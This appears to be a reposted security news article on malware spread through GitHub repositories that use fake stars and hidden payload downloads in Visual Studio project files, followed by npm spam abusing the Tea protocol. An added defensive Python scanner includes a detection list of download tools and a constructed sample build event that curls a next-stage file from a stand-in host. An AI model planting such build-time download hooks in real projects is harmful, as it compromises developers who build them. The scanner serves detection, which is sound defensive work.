    GitHub’s fake popularity scam tricks developers into downloading malware

    By techempire

    Report | April 10, 2024 | Editorial Department | Software security / supply chain attacks


    Threat actors are now exploiting GitHub’s search capabilities to trick unsuspecting users looking for popular repositories into downloading fake counterparts serving malware.

    In a report shared with The Hacker News, Checkmarx said that the latest attack on the open source software supply chain involves hiding malicious code in Microsoft Visual Code project files; the hidden code is designed to download the next stage of the payload from a remote URL.

    “Attackers create malicious repositories using popular names and themes, using techniques such as automatic updates and fake stars to boost search rankings and deceive users,” said security researcher Yehuda Gelb.

    The idea is to manipulate search rankings in GitHub, placing threat actor-controlled repositories at the top as users filter and sort results based on latest updates, and adding fake stars via fake accounts to boost popularity.


    In the process, the attacks give scam repositories a veneer of legitimacy and trust, effectively tricking developers into downloading them.

    “Compared to past incidents where attackers have been seen adding hundreds or thousands of stars to their repositories, in these cases the attackers appear to have chosen a smaller number of stars, possibly to avoid inflated numbers from raising suspicion,” Gelb said.

    It’s worth pointing out that previous research by Checkmarx late last year uncovered a black market consisting of online shops and chat groups that were selling GitHub stars to artificially increase the popularity of repositories, a technique known as star bulge.

    What’s more, most of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of complexity that makes it harder to distinguish them from benign code.


    Some repositories were observed downloading an encrypted .7z file containing an executable called “feedbackAPI.exe” that had ballooned to 750 MB, possibly to evade anti-virus scans, and that ultimately launches malware similar to Keyzetsu Clipper.

    This Windows malware was exposed early last year and is usually spread through pirated software such as Evernote. It can divert cryptocurrency transactions to an attacker-owned wallet by replacing the wallet address copied to the clipboard.

    The findings highlight the due diligence developers must follow when downloading source code from open source repositories, not to mention the dangers of relying solely on reputation as a metric for assessing trustworthiness.
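
    One form that due diligence can take before opening or building a cloned repository is a check of its project files for build-time commands that reach out to a remote URL, the hiding place described above. The script below is an added example, not code from Checkmarx or the article; it assumes MSBuild-style project files (.csproj/.vcxproj) and their build-event elements, which the article does not specify, and its sample inputs are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: MSBuild-style project files (.csproj/.vcxproj); the article does not
# name the exact file type or element the attackers used.
BUILD_EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "Command"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
FETCH_RE = re.compile(
    r"\b(powershell|pwsh|curl|wget|bitsadmin|certutil|Invoke-WebRequest|DownloadFile)\b",
    re.I)

def scan_project(xml_text):
    """Return build-time commands in a project file that reference a URL or a download tool."""
    if "<!DOCTYPE" in xml_text.upper():
        raise ValueError("project file declares a DTD; refusing to parse")
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = el.tag.rsplit("}", 1)[-1]          # drop the XML namespace
        if name in BUILD_EVENT_TAGS:
            cmd = (el.text or "").strip()         # <PreBuildEvent>cmd</PreBuildEvent>
        elif name == "Exec":
            cmd = el.get("Command", "").strip()   # <Exec Command="cmd" />
        else:
            continue
        urls = URL_RE.findall(cmd)
        fetchers = sorted({m.lower() for m in FETCH_RE.findall(cmd)})
        if urls or fetchers:
            findings.append({"element": name, "urls": urls,
                             "fetchers": fetchers, "command": cmd})
    return findings

# Constructed samples, not taken from the campaign.
SAMPLE_SUSPICIOUS = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>curl https://example.invalid/next-stage -o stage.bin</PreBuildEvent>
  </PropertyGroup>
</Project>"""
SAMPLE_BENIGN = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PostBuildEvent>copy "$(TargetPath)" "$(ProjectDir)dist"</PostBuildEvent>
  </PropertyGroup>
</Project>"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_project(sample))
```

    A finding is a prompt to read the command by hand, not a verdict; an empty result only means none of these elements contained a URL or a listed download tool.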

    “The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open source ecosystem,” Gelb said.


    “By exploiting GitHub’s search capabilities and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code.”

    Meanwhile, Phylum said it has seen an increase in the number of spam (i.e. non-malicious) packages posted to the npm registry by a user named ylmin in order to orchestrate “large-scale automated cryptocurrency mining campaigns” that abuse the Tea protocol.

    The company’s research team said: “The Tea protocol is a web3 platform with the stated goal of compensating open source package maintainers, but instead of receiving cash rewards, they receive TEA tokens (a cryptocurrency).”

    “The Tea protocol is not yet live. These users earn points from an ‘incentivized testnet,’ apparently hoping that having more points in the testnet will increase their odds of receiving subsequent airdrops.”
